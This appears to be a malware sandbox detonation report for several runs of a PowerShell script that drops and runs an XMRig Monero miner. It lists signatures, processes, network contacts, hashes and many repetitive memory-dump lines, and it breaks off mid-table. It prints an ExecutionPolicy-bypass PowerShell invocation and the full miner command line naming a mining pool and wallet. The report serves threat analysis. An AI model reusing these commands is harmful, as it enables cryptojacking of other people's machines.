memory/2032-103-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-104-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-105-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-106-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-107-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-108-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-109-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-110-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-111-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-112-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-113-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-114-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-115-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-116-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-117-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-118-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-119-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-120-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-121-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-122-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-123-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-124-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-125-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-126-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-127-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-128-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-129-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-130-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-131-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-132-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-133-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-134-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-135-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-136-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-137-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-138-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-139-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-140-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-141-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-142-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-143-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-144-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-145-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-146-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-147-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-148-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-149-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-150-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-151-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-152-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-153-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-154-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-155-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

memory/2032-156-0x00007FF61D4E0000-0x00007FF61E113000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

memory/4296-0-0x00007FFFE9CF3000-0x00007FFFE9CF5000-memory.dmp

memory/4296-1-0x000001AD8FA10000-0x000001AD8FA32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2i5a2uwb.f12.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4296-11-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/4296-12-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/4296-14-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/4296-15-0x000001ADA7F20000-0x000001ADA7F32000-memory.dmp

memory/4296-16-0x000001ADA7F00000-0x000001ADA7F0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5068-47-0x000002B1A0B10000-0x000002B1A0B30000-memory.dmp

memory/5068-48-0x000002B1A0B60000-0x000002B1A0B80000-memory.dmp

memory/5068-49-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-50-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/4296-51-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/5068-53-0x000002B1A0BA0000-0x000002B1A0BC0000-memory.dmp

memory/5068-52-0x000002B1A0B80000-0x000002B1A0BA0000-memory.dmp

memory/4296-54-0x00007FFFE9CF3000-0x00007FFFE9CF5000-memory.dmp

memory/4296-55-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/5068-56-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/4296-57-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

memory/5068-58-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-60-0x000002B1A0BA0000-0x000002B1A0BC0000-memory.dmp

memory/5068-59-0x000002B1A0B80000-0x000002B1A0BA0000-memory.dmp

memory/5068-61-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-62-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-63-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-64-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-65-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-66-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-67-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-68-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-69-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-70-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-71-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-72-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-73-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-74-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-75-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-76-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-77-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-78-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-79-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-80-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-81-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-82-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-83-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-84-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-85-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-86-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-87-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-88-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-89-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-90-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-91-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-92-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-93-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-94-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-95-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-96-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-97-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-98-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-99-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-100-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-101-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-102-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-103-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-104-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-105-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-106-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-107-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-108-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-109-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-110-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-111-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-112-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-113-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-114-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-115-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-116-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-117-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-118-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

memory/5068-119-0x00007FF7F3300000-0x00007FF7F3F33000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:51

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4616-3-0x00007FF804D63000-0x00007FF804D64000-memory.dmp

memory/4616-6-0x00000160D1D10000-0x00000160D1D32000-memory.dmp

memory/4616-7-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-10-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-11-0x00000160D1EC0000-0x00000160D1F36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4rtrobdh.iit.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4616-28-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-51-0x00000160D2040000-0x00000160D2052000-memory.dmp

memory/4616-64-0x00000160D1E90000-0x00000160D1E9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2568-93-0x000002B6ABE60000-0x000002B6ABE80000-memory.dmp

memory/2568-94-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-95-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/4616-96-0x00007FF804D63000-0x00007FF804D64000-memory.dmp

memory/4616-97-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-98-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/2568-99-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-100-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-101-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-102-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-103-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-104-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-105-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-106-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-107-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-108-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-109-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-110-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-111-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-112-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-113-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-114-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-115-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-116-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-117-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-118-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-119-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-120-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-121-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-122-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-123-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-124-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-125-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-126-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-127-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-128-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-129-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-130-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-131-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-132-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-133-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-134-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-135-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-136-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-137-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-138-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-139-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-140-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-141-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-142-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-143-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-144-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-145-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-146-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-147-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-148-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-149-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-150-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-151-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-152-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-153-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-154-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-155-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-156-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-157-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-158-0x00007FF601410000-0x00007FF602043000-memory.dmp

memory/2568-159-0x00007FF601410000-0x00007FF602043000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:52

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
